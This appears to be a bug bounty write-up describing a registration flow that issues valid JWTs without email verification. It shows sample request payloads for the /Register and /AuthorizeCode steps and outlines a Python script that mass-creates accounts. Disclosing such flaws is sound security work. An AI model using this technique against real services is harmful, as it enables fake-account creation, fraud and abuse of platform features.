How I Found Unlimited Account Creation Vulnerability Due to Improper Access Control

Introduction

During my bug bounty hunting journey, I was testing a web platform when I discovered a significant vulnerability in their user registration system. The application allowed anyone to create an unlimited number of accounts without any email verification or proper access controls.

This write-up details how I found the issue, the technical flow behind it, and why it matters.

Note: All sensitive identifiers, endpoints, and the program name have been redacted in this public write-up.

Discovery

While exploring the signup feature of the platform, I noticed that the frontend was making several API calls to the backend. Instead of the usual single registration request, the application was using a multi-step flow involving authorization codes and token exchange.

This unusual design made me curious. I started intercepting the requests using Burp Suite and quickly realized that the backend was not enforcing critical security checks.

Vulnerability Details

The core issue was Improper Access Control on the account registration pipeline. The application exposed backend endpoints that allowed:

• Account creation without email verification
• Immediate issuance of a valid JWT token
• No strong server-side restrictions on mass registration

The Registration Flow:

The vulnerable flow consisted of 4 simple API requests:

1. OPTIONS /Register

Preflight request (returned 204 No Content)

2. POST /Register

This is where the magic happened. A sample payload looked like this:

{
  "email": "[email protected]",
  "password": "Test1234",
  "optedInForEmails": false,
  "websiteShortCode": "GT",
  "fingerprint": "...",
  "clientId": "...",
  "redirectUrl": "https://target.com/",
  "validationCode": "...",
  "nonce": "..."
}

The response returned:

• success: true
• An authorizationCode

3. OPTIONS /AuthorizeCode

Another preflight request.

4. POST /AuthorizeCode

By simply passing the authorizationCode received in Step-2:

{
  "authorizationCode": "xxxxxxxxxxxxxxxxxxxxxxxx",
  "clientId": "...",
  "validationCode": "..."
}

The server responded with a valid JWT token.

At this point, the account was fully created and usable. I could immediately log in using the email and password provided in the registration step.

Proof of Concept

I automated the entire process by writing a Python script (poc.py).

How the script works:

• It loops through multiple email addresses (e.g., [email protected], [email protected], etc.)
• For each email, it performs the 4-step registration flow
• Extracts the authorizationCode from the registration response
• Exchanges it for a valid JWT token
• Saves the account credentials and token

Using this automation, I was able to create dozens of fully functional accounts in a short time.

Impact

If left unpatched, this vulnerability could allow an attacker to:

• Create thousands of fake accounts rapidly
• Cause database bloat and increased infrastructure costs
• Abuse platform features (reviews, promotions, referrals, etc.)
• Potentially bypass other business logic restrictions

This is a classic example of how missing server-side controls in critical flows can lead to serious abuse.

Conclusion

This vulnerability was discovered by me and my friend Kazi Sabbir while testing the platform’s registration flow. It started as a simple observation but turned into an interesting case of Improper Access Control that allowed unlimited account creation without email verification.

Finding such issues reminds us how critical it is to enforce strong server-side validations, especially on core functionalities like user registration.

Connect with me on LinkedIn!

How I Found Unlimited Account Creation Vulnerability Due to Improper Access Control was originally published in System Weakness on Medium, where people are continuing the conversation by highlighting and responding to this story.